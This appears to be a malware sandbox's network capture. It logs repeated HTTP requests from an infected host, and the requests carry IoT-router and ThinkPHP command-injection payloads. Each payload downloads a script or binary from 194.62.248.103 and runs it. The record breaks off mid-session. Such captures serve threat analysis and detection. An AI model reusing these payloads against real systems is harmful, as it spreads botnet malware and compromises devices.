                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        600192.168.2.235021095.131.72.418080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.088169098 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:30.422781944 CEST140INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html;charset=UTF-8
                                                        Content-Length: 0
                                                        Connection: close
                                                        Cache-control: no-cache


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        601192.168.2.233745094.122.192.2318080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.095325947 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        602192.168.2.233347894.238.154.2098080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.364389896 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:31.257038116 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:33.048662901 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        603192.168.2.233646694.246.110.578080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.393280029 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:30.743782043 CEST36INHTTP/1.1 403 Forbidden


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        604192.168.2.234946495.101.40.15580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.526949883 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:30.836927891 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:36:30 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:30 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 37 63 39 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 39 30 26 23 34 36 3b 61 37 65 32 39 30 39 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 61 37 63 39 31 30 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 39 30 26 23 34 36 3b 61 37 65 32 39 30 39 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a7c91002&#46;1713105390&#46;a7e2909<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;a7c91002&#46;1713105390&#46;a7e2909</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        605192.168.2.235349295.100.33.2980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.529706001 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:31.051316977 CEST134INHTTP/1.0 301 Moved Permanently
                                                        Location: https://www.oracleindustry.com/unknown
                                                        Connection: close
                                                        Content-Length: 0
                                                        Apr 14, 2024 16:36:31.101736069 CEST134INHTTP/1.0 301 Moved Permanently
                                                        Location: https://www.oracleindustry.com/unknown
                                                        Connection: close
                                                        Content-Length: 0
                                                        Apr 14, 2024 16:36:31.201756001 CEST134INHTTP/1.0 301 Moved Permanently
                                                        Location: https://www.oracleindustry.com/unknown
                                                        Connection: close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        606192.168.2.235936695.175.122.22480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.553371906 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        607192.168.2.235562895.86.118.21480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.568902969 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        608192.168.2.235024695.131.72.418080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.757087946 CEST140INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html;charset=UTF-8
                                                        Content-Length: 0
                                                        Connection: close
                                                        Cache-control: no-cache


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        609192.168.2.2350762112.197.148.23880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:30.892450094 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:31.259915113 CEST339INHTTP/1.0 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 21:36:30 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        610192.168.2.234342695.100.185.12880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:31.607714891 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:31.898188114 CEST579INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 357
                                                        Expires: Sun, 14 Apr 2024 14:36:31 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:31 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 33 65 32 32 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 39 31 26 23 34 36 3b 65 36 32 65 33 37 33 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 34 33 65 32 32 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 39 31 26 23 34 36 3b 65 36 32 65 33 37 33 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;43e2217&#46;1713105391&#46;e62e373<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;43e2217&#46;1713105391&#46;e62e373</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        611192.168.2.235351495.100.33.2980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:31.632575989 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:32.143899918 CEST134INHTTP/1.0 301 Moved Permanently
                                                        Location: https://www.oracleindustry.com/unknown
                                                        Connection: close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        612192.168.2.235353695.46.192.18480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:31.658936977 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:32.002429008 CEST317INHTTP/1.1 400 Bad Request
                                                        Server: Web server
                                                        Date: Sun, 14 Apr 2024 14:36:28 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 155
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        613192.168.2.234080095.108.13.2338080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:32.066076040 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        614192.168.2.235307831.200.120.628080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:32.067545891 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        615192.168.2.235954894.120.35.1398080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:32.074295998 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        616192.168.2.233621231.200.32.1578080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:32.075798988 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        617192.168.2.235126095.100.81.1680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:32.252147913 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:32.551636934 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:32 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:32 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 63 61 30 64 35 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 39 32 26 23 34 36 3b 34 32 32 33 33 37 62 38 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 63 63 61 30 64 35 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 39 32 26 23 34 36 3b 34 32 32 33 33 37 62 38 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;cca0d517&#46;1713105392&#46;422337b8<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;cca0d517&#46;1713105392&#46;422337b8</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        618192.168.2.234332095.166.126.2180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:32.257018089 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:32.561625957 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:36:32 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:32 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 35 37 65 61 36 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 39 32 26 23 34 36 3b 33 63 30 61 33 65 33 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 31 35 37 65 61 36 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 39 32 26 23 34 36 3b 33 63 30 61 33 65 33 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;157ea65f&#46;1713105392&#46;3c0a3e3<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;157ea65f&#46;1713105392&#46;3c0a3e3</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        619192.168.2.235337895.217.239.2080
                                                        TimestampBytes transferredDirectionData
